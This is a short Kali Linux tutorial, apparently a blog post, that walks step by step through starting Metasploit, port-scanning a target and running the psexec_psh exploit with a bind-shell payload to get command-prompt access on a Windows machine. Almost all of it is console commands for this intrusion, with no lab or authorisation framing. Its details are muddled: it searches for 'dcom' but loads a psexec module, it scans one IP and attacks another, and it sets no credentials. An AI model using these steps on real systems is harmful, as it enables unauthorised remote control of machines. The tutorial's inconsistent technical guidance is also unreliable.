I am performing it in Kali Linux, assuming that you have gone through the installation steps of Kali Linux.
start the metasploit framework using following command in terminal
- msfconsole
Note: It will take 2-3 minutes to start as it will initiate pqsql and metasploit service.
or use below commands.
- service postgresql start
- service metasploit start
- msfconsole
Perform Port Scan of target
Metasploit offers an awesome port scanning function which goes by the name auxiliary scanner. Here is the command to execute this scan
- use auxiliary/scanner/portscan/tcp
Type show options to see the available options
- show options
- set ports 1-500
Secondly, we have to specify a target IP to scan. Now assuming that you already know the IP of your target. use following command to set the target.
- set RHOST 192.168.63.131
Now we are ready for some action, do a show options again to see what all changes you've made. Finally run following command.
- run
The scan will start and after some time it will show you which tcp ports are open and vulnerable to attack.
Finding Exploits
To find which exploits work on the OS of our target. Search for dcom on msfconsole.
- search dcom
Copy the exploit as below.
- use exploit/windows/smb/psexec_psh
Type show options again
- show options
Again, set the RHOST as IP of your target
- set RHOST 192.168.218.130
Also, set a payload.
- set PAYLOAD windows/shell_bind_tcp
Finally start exploit
- exploit
you can try different exploit and PAYLOAD to get the command prompt access of your target.